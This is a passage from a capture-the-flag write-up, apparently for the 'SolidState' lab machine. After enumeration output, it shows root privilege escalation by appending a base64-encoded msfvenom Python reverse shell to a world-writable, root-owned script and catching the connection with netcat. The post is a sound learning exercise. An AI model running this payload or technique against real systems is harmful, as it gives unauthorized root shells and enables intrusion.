-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 769 Jan 22 2017 /etc/appstream.conf
-rw-r--r-- 1 root root 3173 May 29 2017 /etc/reportbug.conf
-rw-r--r-- 1 root root 2584 Aug 1 2016 /etc/gai.conf
-rw-r--r-- 1 root root 552 May 27 2017 /etc/pam.conf
-rw-r--r-- 1 root root 4781 Jan 24 2017 /etc/hdparm.conf
-rw-r--r-- 1 root root 2969 May 21 2017 /etc/debconf.conf
-rw-r--r-- 1 root root 540 Jun 18 2017 /etc/nsswitch.conf
-rw-r--r-- 1 root root 433 Aug 5 2016 /etc/apg.conf
-rw-r--r-- 1 root root 10368 Apr 5 2017 /etc/sensors3.conf
-rw-r--r-- 1 root root 26 Oct 30 2016 /etc/libao.conf
-rw-r--r-- 1 root root 4988 Mar 11 2017 /etc/rygel.conf
-rw-r--r-- 1 root root 2064 Nov 23 2006 /etc/netscsid.conf
-rw-r--r-- 1 root root 7649 Jun 18 2017 /etc/pnm2ppa.conf
-rw-r--r-- 1 root root 1131 Nov 20 2016 /etc/dleyna-server-service.conf
-rw-r--r-- 1 root root 1963 Jan 18 2017 /etc/rsyslog.conf
-rw-r--r-- 1 root root 2981 Jun 18 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 599 May 5 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf
-rw-r--r-- 1 root root 346 Nov 30 2016 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 34 Apr 9 2017 /etc/ld.so.conf
-rw-r--r-- 1 root root 7431 Jun 18 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 604 Jun 26 2016 /etc/deluser.conf
-rw-r--r-- 1 root root 144 Jun 18 2017 /etc/kernel-img.conf
.
.
Current user's history files:
-rw-r--r-- 1 root root 0 Aug 22 13:41 /home/mindy/.bash_history
.
.
Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Jun 18 2017 .
drwxr-xr-x 12 root root 4096 Aug 22 13:21 ..
.
.
### SCAN COMPLETE ####################################

Lot of stuff here to review. But if we look closely a few things jump out at us. First, the root user can login over SSH. That has potential to be interesting for sure. The other thing that catches our attention is that there is a world writable file owned by root. Maybe we can use this.


World-writable files (excluding /proc):
-rwxrwxrwx 1 root root 105 Aug 22 13:32 /opt/tmp.py

If we go and look at it, we see:


${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()

Wonder what happens if we append our own code to this. We are already using port 4444 for our first shell, lets use 5555 for our next one. We’ll build a payload in msfvenom like so:


root@kali:/var/www/html# msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.16 LPORT=5555 -a cmd -e generic/none --platform Unix
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 549 (iteration=0)
generic/none chosen with final size 549
Payload size: 549 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICA7ICBob3N0PSIxMC4xMC4xNC4xNiIgICAgICA7ICBwb3J0PTU1NTUgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgLCAgICAgIHBvcnQpKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAsICAgICAgMCkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICwgICAgICAyKSAgICAgIDsgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

Now we can put this into the python script:


echo "exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICA7ICBob3N0PSIxMC4xMC4xNC4xNiIgICAgICA7ICBwb3J0PTU1NTUgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgLCAgICAgIHBvcnQpKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAsICAgICAgMCkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICwgICAgICAyKSAgICAgIDsgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" >>/opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICA7ICBob3N0PSIxMC4xMC4xNC4xNiIgICAgICA7ICBwb3J0PTU1NTUgICAgICA7ICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgLCAgICAgIHBvcnQpKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAsICAgICAgMCkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICwgICAgICAyKSAgICAgIDsgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))

Then we waited….and….eventually we got a shell!


root@kali:/var/www/html# nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.51] 36674
id
uid=0(root) gid=0(root) groups=0(root)
hostname
solidstate

Kevin Kirsche

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.

More posts by Kevin Kirsche

Leave a Reply